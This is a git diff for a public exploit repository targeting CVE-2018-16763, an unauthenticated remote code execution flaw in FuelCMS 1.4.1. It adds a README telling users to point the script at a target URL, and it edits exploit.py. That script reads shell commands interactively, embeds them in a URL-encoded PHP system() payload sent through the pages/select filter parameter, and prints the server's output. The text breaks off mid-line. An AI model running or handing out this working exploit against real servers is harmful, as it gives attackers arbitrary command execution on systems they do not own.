diff --git a/README.md b/README.md new file mode 100644 index 0000000..bebb244 --- /dev/null +++ b/README.md @@ -0,0 +1,9 @@ +# CVE-2018-16763 + +## FuelCMS 1.4.1 Remote Code Execution Vulnerability + +This is a port to Python 3 of the vulnerability at https://www.exploit-db.com/exploits/47138, created by 0xd0ff9. + +To run de exploit, just modify the *url* variable in the code with the target url you want to attack, and add the proxies you are behind to the *proxies* list. + +This exploit doesn't require any kind of authentication. \ No newline at end of file diff --git a/exploit.py b/exploit.py index d54610d..0d30c6f 100644 --- a/exploit.py +++ b/exploit.py @@ -18,11 +18,11 @@ import requests import urllib url = "http://x.x.x.x:port" # Change this to the target URL +proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url) while 1: command = input("$: ") exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27" - proxy = {"http" : "http://127.0.0.1:8080"} # List of the proxies you are behind r = requests.get(exploit_url, proxies=proxy) print(r.text[r.text.find("system")+6:r.text.find("